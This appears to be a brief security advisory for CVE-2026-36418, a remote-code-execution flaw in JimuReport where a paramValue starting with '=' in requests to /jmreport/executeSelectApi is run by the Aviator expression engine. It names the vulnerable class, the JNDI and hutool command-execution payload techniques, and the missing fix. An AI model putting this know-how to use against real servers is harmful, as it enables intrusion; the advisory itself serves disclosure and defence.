CVE-2026-36418

An attacker sends a crafted POST request to `/jmreport/executeSelectApi` with a `paramArray` JSON containing a `paramValue` that starts with `=`. The backend passes this value directly to the Aviator expression engine without adequate validation, allowing arbitrary expression execution [ref_id=1]. The researcher demonstrates two payloads: one using JNDI injection (`InitialContext.doLookup`) and another leveraging the hutool-core library's `RuntimeUtil.execForStr` to execute system commands such as `calc` [ref_id=1].

The vulnerability resides in the `/jmreport/executeSelectApi` endpoint of JimuReport, specifically in `org.jeecg.modules.jmreport.desreport.b.a`. The `paramValue` parameter is extracted from user-supplied JSON, passed through `ExpressUtil.a()`, and then compiled and executed by the Aviator expression engine via `exp.execute()` [ref_id=1].

The advisory does not include a published patch. The root cause is that the `ExpressUtil.a()` method compiles and executes user-controlled input as an Aviator expression when the input starts with `=`, with no sanitization or allowlist of permitted functions [ref_id=1]. A proper fix would require validating or restricting the expressions that can be passed to the Aviator engine, or removing the ability to inject arbitrary expressions entirely.